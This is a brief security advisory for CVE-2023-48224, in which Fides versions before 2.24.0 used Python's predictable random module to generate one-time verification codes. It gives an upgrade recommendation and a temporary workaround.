CVE-2023-48224

Name of the Vulnerable Software and Affected Versions Fides versions prior to 2.24.0

Description The Fides Privacy Center allows data subject users to submit privacy and consent requests to data controller users of the Fides web application. If subject identity verification required is set to True, data subjects are sent a one-time code to their email address or phone number. However, the one-time code values were generated by the python random module, a cryptographically weak pseudo-random number generator. This allows an attacker to predict all future one-time code values during the lifetime of the backend python process, enabling them to submit verified data erasure requests or modify a user's privacy preferences.

Recommendations For Fides versions prior to 2.24.0, upgrade to version 2.24.0 or later to secure your system against this threat. As a temporary workaround, consider setting subject identity verification required to False to prevent the use of one-time codes until a patch is applied. However, this may reduce the security of the privacy and consent request process.